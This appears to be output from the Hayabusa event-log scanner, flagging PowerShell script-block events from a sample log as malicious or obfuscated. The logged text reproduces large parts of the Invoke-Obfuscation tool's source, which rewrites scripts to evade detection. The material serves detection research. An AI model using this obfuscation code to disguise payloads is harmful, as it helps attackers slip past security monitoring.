$MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. $TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. # This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. ""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace 